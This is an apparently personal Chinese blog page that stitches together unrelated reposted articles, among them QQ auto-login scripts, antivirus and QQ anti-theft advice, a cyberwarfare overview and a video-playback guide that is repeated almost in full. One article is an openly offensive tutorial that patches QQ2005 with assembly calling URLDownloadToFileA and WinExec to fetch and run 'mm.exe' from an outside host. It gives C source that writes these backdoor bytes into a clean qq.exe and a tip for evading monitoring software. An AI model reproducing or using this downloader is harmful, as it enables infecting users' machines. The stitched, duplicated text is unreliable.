小哲部落格 – XiaoZhe'blog

QQ”永远”运行
自从QQ出现了等级制度之后，现在有不少人都开始了疯狂挂级，希望在联机状态下始终运行QQ，即便被人关闭也能自动启动登录，而且还要防止因异常错误而退出。其实这些事情我们可以使用两个VBS脚本来实现这一目的。

1.QQ自动登录脚本
set fso = Wscript.createObject(“Scripting.FileSystemObject”)
Set f = fso.createTextFile(“QQ自动登录.bat”,true)
f.WriteLine “@echo off” & vbcrlf
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_ ‘列出系统中所有正在运行的程序
if lcase(ps.name)=”qq.exe” or lcase(ps.name)=”tm.exe” then ‘检测是否QQ或TM
QQCMD=ps.commandline ‘提取QQ程序的命行
tmp=Replace(QQCMD,chr(34),space(1))
UIN1=instr(tmp,”QQUIN:”)+6
if not len(UIN1)=0 then
QQUIN=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1) ‘取QQ号码.
QQ=QQ+1
QQNUM=QQNUM & “QQ号码” & QQ & “:” & vbtab & QQUIN & vbcrlf
f.WriteLine “ECHO QQ号码:” & QQUIN
f.WriteLine “ECHO 命令行:” & QQCMD
f.WriteLine QQCMD & vbcrlf
end if
end if
next
if not len(QQ)=0 then
MSGBOX “已经成功提取以下QQ号码的自动登录命令行” & vbcrlf & vbcrlf & QQNUM & vbcrlf & “具体请查看当前目录下的文件”,0,”QQ自动
登录命令提取脚本 BY chenall QQ:XXXXXX”
else
msgbox “提取QQ自动登录命令失败,请查看QQ或TM是否正在运行.”,0,”QQ自动登录命令提取脚本 BY chenall QQ:XXXXXX”
f.close
set f = fso.getfile(“QQ自动登录.bat”)
f.delete
end if
将这些代码存储为”*.vbs”文件。然后将所有需要自动登录的QQ号码全部登录，再在一个QQ上点击”菜单”→”一键切换到TM”。此后运行该VBS脚本，会发现在当前目录下生成了一个”QQ自动登陆.bat”的文件，运行该文件即可自动登录所有QQ号码。
小提示：代码中的”XXXXXX”代表你的QQ号。

2.QQ防止关闭脚本
dim QQUIN
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_ ‘列出系统中所有正在运行的程序
if lcase(ps.name)=”qq.exe” or lcase(ps.name)=”tm.exe” then ‘检测是否QQ或TM
AppPath=ps.commandline ‘提取QQ程序的命行
tmp=Replace(AppPath,chr(34),space(1))
UIN1=instr(tmp,”QQUIN:”)+6
QQUIN=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1) ‘取QQ号码.
end if
next
if len(QQUIN)=0 then
msgbox “系统中没有运行QQ或TM程序,请重新启动QQ或TM,登陆后再使用一键换切换一下QQ或TM程序,再运行本脚本”
else
do ‘循环检测
myqqin=chkuin(QQUIN) ‘检测上面提取出来的QQ号码是否有在本机打开
if not myqqin then ‘如果没有运行则,重新运行QQ程序并登录
runapp(AppPath) ‘
wscript.sleep 10000 ‘等待10秒
else
wscript.sleep 5000 ‘等待5秒
end if
loop ‘返回继续检测
end if

function RunApp(AppPath)
dim obj
set obj = createobject(“WScript.Shell”)
obj.exec(AppPath)
end function

function chkuin(QQUIN)
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_
if lcase(ps.name)=”qq.exe” or lcase(ps.name)=”tm.exe” then
AppPatht=ps.commandline
‘by chenall qq 368178720
tmp=Replace(AppPatht,chr(34),space(1))
UIN1=instr(tmp,”QQUIN:”)+6
QQUINTMP=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1)
if QQUINTMP=QQUIN then chkuin=true end if
end if
next
end function
将以上代码存储为”*.vbs”文件。而后登录QQ，一键切换到TM，再运行VBS脚本。此后，即使关闭了TM/QQ，它也会自动启动并登录至网络。经笔者在Windows XP SP2系统上测试，完全有效。

题外提示：现在腾讯已经取消QQ等级小时制了，新的等级计算方法请去腾讯官方网站查看，本文由 音樂狂迷 引用，为想24小时QQ在线的朋友提供~~

1。思路篇
平心而论，我不怎么喜欢那些全是操作的文章，从头到尾都是先这样，再那样。几乎学不到什么东西。
比如讲某个木马，怎么反弹端口，怎么隐蔽，就是不给出思路的。实在不利于我们菜鸟的学习。牢骚几句，
开始正题：
首先，我们来手工把qq2005做成后门(必要的过程)，然后在具体分析，思路是怎么横空出世的。
因为编程实现不过是把手工的过程变成了自动的过程而已。这里又面临一个选择，是详细写出用ollydbg修改
qq的详细过程，还是一笔带过呢？考虑到《逆》一文中的这个过程被一笔带过了(肯定带来的不少我等菜鸟的痛苦)，
所以我选择详细写出这个过程。这样才算手把手的教，是吧。由于我很讨厌抓图，所以一部分过程我就不抓图了。


用ollydbg打开qq.exe，这时候程序会停在入口点，F2下个断点，为什么呢？因为要么要修改qq的入口代码。
下断点后，很容易在找到这个位置，按ALT+B，双击断点，又回到入口了吧，是不是很方便。呵呵
拖动CPU窗口的滚动条，到qq.exe的尾部，找到一大片的全是 db 0 的地方，这个可以理解为PE的空隙。
我找到的地址是004D4D90，按着鼠标左键向下拖动，选中的部分是黄色的，按CTRL+E或者右键－>二进制->
编辑, 输入要下载的后门的地址：”http://hackor.51.net/mm.exe“(不包括引号)， 回车，看到一堆不知道是什么的汇编代码吧，没有关系，CTRL+A分析一下，好看多了吧，如图1。同样的方法在004D4DCD(距离004D4D90比较远，是为了留出足够的空间来存放比较长的URL)添加”d:\ok.exe”,如图2。继续添加如下汇编代码(为什么这样添加呢，随后给出)：


004D4DEB 60 pushad
004D4DEC 6A 00 push 0
004D4DEE . 6A 00 push 0
004D4DF0 . 68 CD4D4D00 push QQ.004D4DCD ; ASCII “d:\ok.exe”
004D4DF5 . 68 904D4D00 push QQ.004D4D90 ; ASCII “http://hackor.51.net/mm.exe“
004D4DFA . 6A 00 push 0
004D4DFC . E8 CAEBBC75 call urlmon.URLDownloadToFileA
004D4E01 . 61 popad
004D4E02 . 60 pushad
004D4E03 . 6A 05 push 5 ; /ShowState = SW_SHOW
004D4E05 . 68 CD4D4D00 push QQ.004D4DCD ; |CmdLine = “d:\ok.exe”
004D4E0A . E8 26AF9777 call kernel32.WinExec ; WinExec
004D4E0F . 61 popad
004D4E10 . C3 retn
004D4E11 00 db 00
004D4E12 00 db 00
004D4E13 > 60 pushad
004D4E14 . 6A 00 push 0 ; /arg = NULL
004D4E16 . 6A 00 push 0 ; |stksize = 0
004D4E18 . 68 EB4D4D00 push QQ.004D4DEB ; |start = QQ.004D4DEB
004D4E1D . E8 65307377 call MSVCRT._beginthread ; _beginthread
004D4E22 . 61 popad


004D4E23 . 55 push ebp
004D4E24 . 8BEC mov ebp,esp
004D4E26 . 6A FF push -1
004D4E28 .^ E9 30FDF8FF jmp QQ.00464B5D


按CTRL+A分析一下，看到了什么：
004D4DEB . 60 6A 00 ascii “`j”,0
004D4DEB居然变成了这个，呵呵，用ollydbg的小技巧，选中这行，右键->分析->在下一次分析期间，将选择视为命令。呵呵，ok了吧。编辑的时候还会出现其它的不好看的东西，那是ollydbg分析错误导致的，需要手动调整，视为命令，字符等等(具体情形请自行分析)。
现在来回答为什么这样添加的问题：004D4E18处压入的是004D4DEB(也就是URLDownloadToFileA的地址)，这样当这个_beginthread启动的时候，会调用URLDownloadToFileA，去下载我们的mm.exe，紧接着执行WinExec函数，这样我们下载的mm.exe就被执行了，最后用retn返回。其中004D4E22到004D4E26是qq的入口代码，为了不影响qq的运行，我们还是要保存地。下面接着修改qq的入口代码，使之跳到004D4E13去执行我们的_beginthread。注意修改前请先保存，右键－>复制到可执行文件，选择一个文件名就ok了。
修改后(如图3)：
00464B58 Q> 34;$ /E9 B6020700 jmp QQ.004D4E13
00464B5D > |68 18104E00 push QQ.004E1018
修改完成后，右键复制到可执行文件，全部修正。
整个过程要注意堆栈平衡。上面的pushad和popad就是用来保持堆栈平衡的。

2。具体编程实现：
有了前面的过程，这个就简单了。用什么语言实现都一样，看你的个人爱好了。我用的c语言
我们 的程序就是修改qq，把正常的qq.exe修改成上面这样的。那么要修改那些地方呢？
有2个办法，用ollydbg同时开修改后的qq.exe和修改前的qq.exe，对比发现即可。但是不太方便。
还可以使用Hex Workshop，我用的就是这个，它可以比较2个文件，下载地址：http://www.pediy.com/tools/Editors/Hex%20workshop/Hex%20workshop%204.23.zip
安装完成后，打开Hex Workshop，CTRL+K,选择路径，如图4，ok
F6将自动定位到不同之处。
偏移为：
0x64b58
0xD4D90
0xd4dcd
0xd4deb

我们只需要编程修正以上地方的代码就可以了，还有一个问题是，我怎么知道要修正多少个字节呢？
用Hex Workshop计算一下就知道了啊(2个地址相减就ok了)，修正字节数并不要求特别准确。不影响程序的运行就可以了。
整个程序如下(非常简单)：
//winxp sp1 + qq2005


#include
#include
#include


int main(int argc, char* argv[])
{
FILE *fp;
unsigned int i;
int entryPoint[] = {233,182,2,7,0}; //入口要修正的字节
char *pDownURL = NULL; //指向下载URL的指针
char *pPathAndFileName = NULL; //指向文件路径和文件名的指针
int backDoor[] =
{
96,106,0,106,0,104,205,77,77,0,104,144,
77,77,0,106,0,232,202,235,188,117,
97,96,106,5,104,205,77,77,0,232,38,
175,151,119,97,195,0,0,96,106,0,106,
0,104,235,77,77,0,232,101,48,115,
119,97,85,139,236,106,255,233,48,
253,248,255,0
};


if(argc != 3)
{
printf(“tt Make qq to be downloader”);
printf(“ttttngaut All rights reserved.”);
printf(“Usage: %s “, argv[0]);
printf(“%s and qq.exe should at the same directory”, argv[0]);
printf(“The os should be winxp sp1 and The qq version should be 2005”);
printf(“pathAndFileName should like:t d:\\mm.exe not d:\mm.exe”);
return 1;
}

pDownURL = argv[1];
pPathAndFileName = argv[2];

printf(“tt Make qq to be downloader”);
printf(“Cracking……”);

// 1. 打开文件qq.exe ,这个是正常的qq.exe
if ((fp = fopen(“QQ.exe”, “r+”))==NULL)
{
printf(“error!!! Can not open qq.exe!!!”);
printf(“Press any key to continue”);
getchar();
exit(0);
}

//2. set entry point
fseek(fp, 0x64b58, SEEK_SET);
for (i=0; i<5; i++)
{
fputc( (char)entryPoint, fp);
}



// 3. set downURL
fseek(fp, 0x00D4D90, SEEK_SET);

for (i=0; i {
fputc(pDownURL, fp);
}
fputc(0, fp); //这里写入0，因为必须要以0结尾，下同


// 4. set pathAndFileName
fseek(fp, 0xd4dcd, SEEK_SET);

for (i=0; i {
fputc(pPathAndFileName, fp);
}
fputc(0, fp);



// 5. set backDoor code
fseek(fp, 0xd4deb, SEEK_SET);

for (i=0; i<66; i++)
{
fputc( (char)backDoor, fp);
}


fclose(fp);

printf(“Thanks for using, already cracked!!!”);
printf(“ttttngaut All rights reserved.”);

return 0;
}


上面的i用于控制要写入的字节数，并不需要非常精确，但是不要影响程序的执行。每次写入前
都要用fseek函数移动文件指针到指定位置。用ollydbg看看程序的反汇编代码，你会发现backDoor
就是我们后门关键部分对应的汇编代码，上面的程序有个小技巧，那就是如何得到
entryPoint和backDoor数组的内容。而且可以看到它们都是int，使用时才被转化为char
下面的代码用于得到entryPoint数组和backDoor数组的内容(个人方法很巧妙)：
//winxp sp1 + qq2005



#include
#include
#include



int main(int argc, char* argv[])
{
FILE *fp;
unsigned int i;

// 1. 打开文件qq.exe, 注意这个qq是修改过的
if ((fp = fopen(“QQ.exe”, “r+”))==NULL)
{
printf(“error!!! Can not open qq.exe!!!”);
printf(“Press any key to continue”);
getchar();
exit(0);
}


//get entryPoint code
fseek(fp, 0x64b58, SEEK_SET);
for (i=0; i<5; i++)
{
printf(“%d,”, fgetc(fp));
}
printf(“”);

fseek(fp, 0xd4deb, SEEK_SET);

for (i=0; i<67; i++)
{
printf(“%d,”, fgetc(fp));
}
printf(“”);

fclose(fp);


return 0;
}
运行结果如图5，真漂亮，呵呵。


编程介绍完了。怎么样，还算简单吧。
最后补充一点，我们创建线程还是逃不过某些软件的监视，那么我们该怎么解决呢。我们自己不创建就行了，
借用别人的啊，比如flashget多线程下载，再说了，现在太多的软件都创建线程，只要不我们的代码挂上别人的线程就可以了，winxp sp2 和 flashget1.65测试成功，未做更多的测试，应该是可以的。我想这个方法可以叫做借尸还魂吧，呵呵，具体修改过程以及对应的代码分析就不写了，手指都麻了，好了，下次见。


趁自己还年轻，多写点东西贡献给大家。也算是自己人生一大志愿。总体来说我写的东西都很简单，因为我就是一菜鸟，写不出什么高难度的东西来。

网络战正在成为高技术战争的一种日益重要的作战样式，其好处是可以兵不血刃地破坏敌方的指挥控制、情报信息和防空等军用网络系统，甚至可以悄无声息地破坏、瘫痪、控制敌方的商务、政务等民用网络系统，不战而屈人之兵。

美军认为，网络战是为干扰、破坏敌方网络信息系统，并保证己方网络信息系统的正常运行而采取的一系列网络攻防行动。网络战分为两大类：一类是战略网络战；另一类是战场网络战。

　　战略网络战又有平时和战时两种。平时战略网络战是，在双方不发生有火力杀伤破坏的战争情况下，一方对另一方的金融网络信息系统、交通网络信息系统、电力网络信息系统等民用网络信息设施及战略级军事网络信息系统，以计算机病毒、逻辑炸弹、黑客等手段实施的攻击。而战时战略网络战则是，在战争状态下，一方对另一方战略级军用和民用网络信息系统的攻击。

　　战场网络战旨在攻击、破坏、干扰敌军战场信息网络系统和保护己方信息网络系统，其主要方式有：利用敌接受路径和各种“后门”，将病毒送入目标计算机系统；让黑客利用计算机开放结构的缺陷和计算操作程序中的漏洞，使用专门的破译软件，在系统内破译超级用户的口令；将病毒植入计算机芯片，需要时利用无线遥控等手段将其激活；采用各种管理和技术手段，对己方信息网络系统严加防护。当然，战场网络战的作战手段也可用于战略网络战。

　　早在1991年的海湾战争中，美军就对伊拉克实施了网络战。开战前，美国中央情报局派特工到伊拉克，将其从法国购买的防空系统使用的打印机芯片换上了染有计算机病毒的芯片。在战略空袭前，又用遥控手段激活了病毒，致使伊防空指挥中心主计算机系统程序错乱，防空系统的C3I系统失灵。在1999年的科索沃战争中，网络战的规模和效果都有增无减。南联盟使用多种计算机病毒，组织“黑客”实施网络攻击，使北约军队的一些网站被垃圾信息阻塞，北约的一些计算机网络系统曾一度瘫痪。北约一方面强化网络防护措施，另一方面实施网络反击战，将大量病毒和欺骗性信息注入南军计算机网络系统，致使南军防空系统陷于瘫痪

一、病毒杀不死的原因
　　经常听人说，病毒软件报告杀死了某某病毒，可是重新启动后该病毒仍旧存在，无法杀死。病毒杀不死的原因主要有：
　　1.病毒正在运行。由于Windows保护正在运行的程序，所以杀毒软件是无法杀死正在运行的病毒。即使是真的杀死了病毒，电脑正常关机时内存中活动的病毒还会再复制一个病毒到硬盘上。
　　2.病毒隐藏在系统还原的文件夹“_restore”中。

二、对策
　　1.在Windows中杀毒前首先得中止病毒进程。对于WindowsXp/2000，可以使用任务管理器(Ctrl+Alt+Del三键齐按)来查看当前所有的进程，而对于Windows98/Me，则可以使用“黑客入门工具箱”或ATM来查看进程。确定哪个是来历不明的就停止掉或者看哪个不顺眼就停止哪个，该过程俗称“杀进程”。不要怕出错，因为不会对电脑造成任何损坏，最多就是死机。注意，杀进程的操作有时得进行两次才成功。有的病毒有两个进程，互相保护，杀掉一个则会被另一个发现并恢复。此时应先把该病毒在注册表中的启动项去掉，然后用突然断电的方式重启电脑，再杀毒。
　　2.在Windows中使用专杀工具杀毒。得使用最新的杀毒版本。
　　3.禁用系统还原。在WindowsMe中禁用方法是∶鼠标右键点击“我的电脑”-属性-性能-文件系统-疑难解答-禁止系统还原。在WindowsXP中禁用方法是∶控制面板-系统-系统属性-系统还原-在所有驱动器上关闭系统还原。然后用软盘或U盘启动电脑，在dos下删除_RESTORE文件夹。
　　4.在Dos下杀毒不存在杀不死的问题。一般的杀毒软件都可以制作软盘版(含至少3张软盘)，用第一张盘启动(CMOS中必须设定软盘启动在前)后按提示陆续放入其它盘就可以直接杀毒了。瑞星的软盘版需要用鼠标确定杀毒的驱动器，而金山毒霸的软盘版则默认全机查杀。实际上用金山毒霸在DOS下杀毒还可以更简单，用普通软盘启动盘或U盘启动盘启动电脑后，先换到C盘，然后进入金山毒霸的目录(命令：cd kav或cd kav5，与版本有关)，然后输入KAVDX，回车就开始杀毒了。
　　5.补充操作。病毒杀死后还应该修复注册表~~~~

本文由红客联盟提供，音樂狂迷引用~

QQ因它在网络的特殊地位，受到越来越多的黑客的关注，也越来越多的菜鸟们QQ频频被盗，实在冒火。下面我就将我在QQ防黑方面的经验和一些很有用的小点子拿来给菜鸟们分享，希望能对广大的菜鸟们有所帮助。（本文主要向菜鸟们讲述QQ安全防范知识，所以一些高深的技术和原理，我只提供一个思路不作细究，相关黑客软件也不做详细介绍和提供下载，望广大老鸟们和对这些方面感兴趣的朋友谅解。本文以QQ2000和Windows2000做为技术背景，大部分内容对其他版本的QQ及操作系统也有效。）

常见QQ攻击方法：
1、暴力破解
用暴力破解+好的密码词典来对本地的QQ密码文件或在线QQ配合好的密码词典进行暴力破解。

2、专门的破解工具
这类软件一种是直接破解出曾经选择过“下次登录不显示登录框”的本地QQ号
的最后一次的密码，一种是使用了叫做“隐身穿墙术”的QQ黑软，通过一个独立的执行文件调用QQ主程序，跳过密码验证直接登录QQ。

3、使用木马程序
通过诱骗目标去浏览藏有QQ木马的网页，让木马自动下载并运行，或向目标发送绑捆了木马的软件、图片等文件让其执行。木马通过获取QQ登录窗口密码或记录击键记录盗取密码，并发向指定Email（黑基赠送给黑基会员的盗QQ密码的软件就是这类软件）或保存在计算机的指定位置。

4、破解注册QQ密码保护登记的Emai密码
通过破解目标注册QQ密码保护邮箱的密码来获得你的QQ密码。

5、利用QQ软件本身的漏洞
利用QQ软件本身的漏洞来向目标发送攻击信息，使其被迫下线或造成QQ程序错误退出。

防范措施：
一、最最基本的防范：一定要申请密码保护。（千万不要亡羊补牢哦）
二、针锋相对的防范：
1、对于暴力破解：
①一个复杂的密码是关键，8位以上的数字+大小写字母+符号，这样的设置是对暴力破解者耐心的一个挑战，要是在线破解这也将是对其经济实力的挑战。
②下线后删除保存有你QQ号码记录的文件夹，防止本地密码文件的破解。
③登录QQ时可以在号码前加很多的0登录，这样可以躲过qqdreams等一类的在线破解软件对你的QQ号的探测。
④使用QQ代理，不轻易和对方进行“二人世界”聊天以隐藏自己的真实ip ，避免在线破解。
2、对于专门的破解软件：
①下线后删除保存有你QQ号码记录的文件夹。
②登录QQ时不要选择保存密码。
③在QQ所在的文件夹下，删除子文件夹中的OICQ2000.cfg文件，这样下次 启动QQ将只能使用“注册向导登录”，这将使“隐身穿墙术”失效。
3、对于木马：
这是目前最流行的盗号方式。
①安装杀毒软件和_blank”>防火墙，起用他们的实时监控功能，及时升级毒库。黑 基的QQV2004也是一款不错的QQ保护软件。
②不要随意浏览网友发来的网页。如果实在战胜不了你的好奇心，那你可 以先将IE的安全级别改为“高”，禁用IE中的ActiveX、活动脚本和文 件下载，然后再去浏览。当然你要是很精通网页编程的话，你也可以先 用一些能直接读取网页源代码的工具（电猫工作室就有一款不错的）读 出源代码，分析代码后再决定是否浏览。
③不要随意运行网友发来的文件。在资源管理器或我的电脑中，将“文件 夹” 选项中的“查看”设置成不隐藏已知文件扩展名。对发来的文件 进行病毒扫描，特别注意*.JPG.EXE的文件，十有八九都有问题。对于 winrar的自解压文件不要去双击解压，点鼠标右键选择“用winrar打开 …”。更高超一点的就是对.exe和.BMP的文件进行脱壳和用16进制编 辑器来分析，我想这些就不是一般的菜鸟能及的了。
④对于键盘记录工具，可以通过交换密码的输入顺序来迷惑它。如：123的 密码，我可以先输2，然后用鼠标将光标移到2的左边输1，最后将光标移 到2的右边输3，这样它就会误认为密码是213。记住一定要用鼠标移动光 标哦。还有一个方法就是你打开记事本，将密码写上，然后用“复制” “粘贴”将密码粘贴到输入框，这样还可以方便的使用中文密码哦。
⑤对于那些直接获取输入框中密码的木马，菜鸟能使用的的方法就是使用 升级了最新毒库的杀毒软件，用_blank”>防火墙阻止不明程序发送email，下网后 查找C盘中可疑的*.log、*log.txt文件并删除。当然老鸟们可能会使用 查杀木马的一般步骤，从系统进程、启动、注册表、系统文件等方面进 行彻底的查杀。熟悉ActiveX控件的，还可以做一个程序对向windows的 Edit控件发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查。
4、对注册QQ密码保护登记的Email破解
①使用复杂的email密码。
②QQ资料中的email不要与申请密码保护的email相同。
5、对于QQ本身的漏洞
这是目前成功率最高的攻击方式。
①临时的解决方法：将攻击者放入黑名单。
②根本的解决方式：及时下载软件补丁。

视频播放的新问题全面解析

宽带的普及使在线点播视频成为可能，宽带的普及也让曾经备受网友们喜爱的RMVB视频逐渐被DVDRip视频所取代。DVDRip视频以其和DVD相差无几的清晰程度，受到很多影迷的欢迎。不过，由于这种格式需要编码支持，各种编码在不同的工作环境下表现不一，此外还需要字幕外挂工具等的协同工作，因此播放DVDRip格式的影片有时会出现一些奇怪的问题。在本文中，笔者就和大家来谈谈视频播放的新问题及其解决方法。

正确选择编码插件和播放软件

现在的AVI除了最老的Windows就支持的格式外，还有用Divx和Xvid编码及直接用MPEG4压缩成的AVI格式视频。一般来说，高版本Windows媒体播放器已经自动支持MPEG4格式，而且在连线状态下它会自动下载Divx和Xvid的编码。不过Windows媒体播放器8.0以下的版本没有亮度调节功能，很多AVI文件播放时无法选择播放进度，或是选择播放进度后只有声音无图像；9.0版本对AVI格式兼容性要求过高，编码稍微错误的AVI文件就无法播放。

以笔者的经验，用Divx5.1+Xvid+AC3解码（这些插件都可在Shooter.com.cn找到）是最佳组合。建议不要装FFSHOW这类号称一专多能的插件，有时会遇到播放时只有声音，图像变成一大块青色或粉红色块的问题。此外，各种插件编码之间会互相影响——如果你安装了某些编码播放AVI文件时遇到问题，卸载后再安装Divx5.1+Xvid+ AC3，也未必能恢复正常，你可能需要重新安装操作系统。

至于播放软件，由于至今也没一个兼容所有文件格式的软件，因此建议的组合是Windows媒体播放器+第三方播放软件（如金山影霸2003、WinDVD等）。Windows媒体播放器用来播放ASF、WMV等格式的文件，第三方播放软件用来播放RM等其他格式的文件。

正确处理字幕问题

1． 挑选中文字幕

绝大多数DVDRip视频都采用外挂字幕的形式，字幕文件有SRT、SSA、SUB三种格式。SUB是未经OCR识别的字幕，本质还是一串图形，需要IDX文件的支持；SRT和SSA 则是文字格式的字幕，只需要单独一个文件即可使用，文件一般仅有几十KB，便于传播。外挂的字幕文件往往不是纯中文的，有时有英文和中文甚至日文、法文等多种选择，默认情况下一般播放英文字幕。如果你依赖播放软件本身的挑选字幕功能，可能会出现无法正确选择中文字幕的现象。因此，我们应该安装VobSub这个专门的字幕文件工具。

VobSub除了能在播放时自动打开字幕文件外，还具备选择字幕类型的功能。安装VobSub后，播放DVDRip格式的AVI文件时，我们会在任务栏的系统托盘区看见绿色的小图标，用鼠标双击这个小图标打开如图所示的对话框，在“Main”选项卡下的“language”下面，我们可以选择字幕语言。一般简体中文字幕会带有Chinese、cn、gb等字样，而big5、traditional Chinese等则是繁体中文字幕。需要注意的是，字幕文件名称必须和视频文件名称一致，否则播放视频文件时VobSub不会自动播放字幕文件。


2． 解决字幕不同步的问题

由于DVDRip可能是由不同组织用不同的DVD版本做出来的，因此可能会出现字幕不同步的情况。在VobSub中，我们可以切换到“Timing”选项卡，调整第一个对话框中的数值，数值越大，字幕出现的速度就越快，反之则越慢。自己慢慢揣摩适当的比例吧。当然，如果字幕和对白相差太远，建议大家去下载适合当前DVDRip版本的字幕文件。

提示：字幕改了Timing后，应该重新启动播放软件。如果只是暂时停止了播放，可能会发生程序响应极慢或者是死机的现象。


视频播放常见问题分析

不是所有视频文件安装好编码插件后就能一帆风顺地观看下去，有些视频文件源文件亮度就不够，或是用户的显示器使用时间太长，亮度已经下降很多，在这些情况下需要手工调节播放的亮度。

1． 亮度调节、截图等问题

如果你用的是Windows媒体播放器8.0以上版本，可以在播放视频文件时单击“查看→正在播放工具→视频设置”，然后拖动相应的滑块调整画面亮度及色彩等选项（如图）。如果是使用《金山影霸2003》，在播放的时候把鼠标指针移动到屏幕最顶端，就会出现亮度、对比度及色彩的调节选项。当然，你也可以用PowerStrip等专业工具来调节显示的亮度和对比度。


视频文件的截图相对来说比较容易，但由于视频画面是通过DirextX输出的，因此用键盘上的Print Screen功能键无法截取视频画面，我们需要用版本较高的第三方抓图工具，如HyperSnap 4、SnagIt 6等等。

2． 画面倒转了怎么办

有些特殊编码的文件在播放时可能会出现画面倒转的问题（如图2），也有可能是由于该文件没有字幕文件造成的：我们可以把其他文件的字幕复制到这个目录，然后把名称改成相同的，再按上面的操作将字幕出现的速度调快一些，一般就可正常播放了。我们也可以使用播放软件本身支持的画面倒转功能来解决问题：假如我们用的是《金山影霸2003》，可以在播放画面上单击鼠标右键，选择“图像翻转播放”。如果你用的是Windows媒体播放器，且已经开启了VobSub，可以用鼠标右键单击任务栏上系统托盘区的绿色箭头，选择“Flipped Picture”命令即可。

3． 轻松播放RMVB格式文件

我们可以将RMVB格式文件的后缀直接改为RM，当作RM格式来播放。如果更改文件后缀名后无法正确播放，可以下载Real One Player的RMVB升级补丁。《金山影霸2003》也有一个专门的RMVB升级包，安装后就可以直接播放RMVB文件了。

最后要提醒大家的是，最新的软件和编码不一定效果最好，有时会遇上兼容性问题。比如DirectX 9就和部分电视卡有冲突。大家最好根据自己的软、硬件环境来选择配套的播放工具及编码支持，对于必须要Windows Media Player 9才能播放的影片，笔者的建议是安装多操作系统，各自安装不同的播放软件。此外，大家可以多关注射手网（Shooter.com.cn），那上面有最新的编码插件和播放软件。

视频播放的新问题全面解析

宽带的普及使在线点播视频成为可能，宽带的普及也让曾经备受网友们喜爱的RMVB视频逐渐被DVDRip视频所取代。DVDRip视频以其和DVD相差无几的清晰程度，受到很多影迷的欢迎。不过，由于这种格式需要编码支持，各种编码在不同的工作环境下表现不一，此外还需要字幕外挂工具等的协同工作，因此播放DVDRip格式的影片有时会出现一些奇怪的问题。在本文中，笔者就和大家来谈谈视频播放的新问题及其解决方法。

正确选择编码插件和播放软件

现在的AVI除了最老的Windows就支持的格式外，还有用Divx和Xvid编码及直接用MPEG4压缩成的AVI格式视频。一般来说，高版本Windows媒体播放器已经自动支持MPEG4格式，而且在连线状态下它会自动下载Divx和Xvid的编码。不过Windows媒体播放器8.0以下的版本没有亮度调节功能，很多AVI文件播放时无法选择播放进度，或是选择播放进度后只有声音无图像；9.0版本对AVI格式兼容性要求过高，编码稍微错误的AVI文件就无法播放。

以笔者的经验，用Divx5.1+Xvid+AC3解码（这些插件都可在Shooter.com.cn找到）是最佳组合。建议不要装FFSHOW这类号称一专多能的插件，有时会遇到播放时只有声音，图像变成一大块青色或粉红色块的问题。此外，各种插件编码之间会互相影响——如果你安装了某些编码播放AVI文件时遇到问题，卸载后再安装Divx5.1+Xvid+ AC3，也未必能恢复正常，你可能需要重新安装操作系统。

至于播放软件，由于至今也没一个兼容所有文件格式的软件，因此建议的组合是Windows媒体播放器+第三方播放软件（如金山影霸2003、WinDVD等）。Windows媒体播放器用来播放ASF、WMV等格式的文件，第三方播放软件用来播放RM等其他格式的文件。

正确处理字幕问题

1． 挑选中文字幕

绝大多数DVDRip视频都采用外挂字幕的形式，字幕文件有SRT、SSA、SUB三种格式。SUB是未经OCR识别的字幕，本质还是一串图形，需要IDX文件的支持；SRT和SSA 则是文字格式的字幕，只需要单独一个文件即可使用，文件一般仅有几十KB，便于传播。外挂的字幕文件往往不是纯中文的，有时有英文和中文甚至日文、法文等多种选择，默认情况下一般播放英文字幕。如果你依赖播放软件本身的挑选字幕功能，可能会出现无法正确选择中文字幕的现象。因此，我们应该安装VobSub这个专门的字幕文件工具。

VobSub除了能在播放时自动打开字幕文件外，还具备选择字幕类型的功能。安装VobSub后，播放DVDRip格式的AVI文件时，我们会在任务栏的系统托盘区看见绿色的小图标，用鼠标双击这个小图标打开如图所示的对话框，在“Main”选项卡下的“language”下面，我们可以选择字幕语言。一般简体中文字幕会带有Chinese、cn、gb等字样，而big5、traditional Chinese等则是繁体中文字幕。需要注意的是，字幕文件名称必须和视频文件名称一致，否则播放视频文件时VobSub不会自动播放字幕文件。


2． 解决字幕不同步的问题

由于DVDRip可能是由不同组织用不同的DVD版本做出来的，因此可能会出现字幕不同步的情况。在VobSub中，我们可以切换到“Timing”选项卡，调整第一个对话框中的数值，数值越大，字幕出现的速度就越快，反之则越慢。自己慢慢揣摩适当的比例吧。当然，如果字幕和对白相差太远，建议大家去下载适合当前DVDRip版本的字幕文件。

提示：字幕改了Timing后，应该重新启动播放软件。如果只是暂时停止了播放，可能会发生程序响应极慢或者是死机的现象。


视频播放常见问题分析

不是所有视频文件安装好编码插件后就能一帆风顺地观看下去，有些视频文件源文件亮度就不够，或是用户的显示器使用时间太长，亮度已经下降很多，在这些情况下需要手工调节播放的亮度。

1． 亮度调节、截图等问题

如果你用的是Windows媒体播放器8.0以上版本，可以在播放视频文件时单击“查看→正在播放工具→视频设置”，然后拖动相应的滑块调整画面亮度及色彩等选项（如图）。如果是使用《金山影霸2003》，在播放的时候把鼠标指针移动到屏幕最顶端，就会出现亮度、对比度及色彩的调节选项。当然，你也可以用PowerStrip等专业工具来调节显示的亮度和对比度。


视频文件的截图相对来说比较容易，但由于视频画面是通过DirextX输出的，因此用键盘上的Print Screen功能键无法截取视频画面，我们需要用版本较高的第三方抓图工具，如HyperSnap 4、SnagIt 6等等。

2． 画面倒转了怎么办

有些特殊编码的文件在播放时可能会出现画面倒转的问题（如图2），也有可能是由于该文件没有字幕文件造成的：我们可以把其他文件的字幕复制到这个目录，然后把名称改成相同的，再按上面的操作将字幕出现的速度调快一些，一般就可正常播放了。我们也可以使用播放软件本身支持的画面倒转功能来解决问题：假如我们用的是《金山影霸2003》，可以在播放画面上单击鼠标右键，选择“图像翻转播放”。如果你用的是Windows媒体播放器，且已经开启了VobSub，可以用鼠标右键单击任务栏上系统托盘区的绿色箭头，选择“Flipped Picture”命令即可。

3． 轻松播放RMVB格式文件

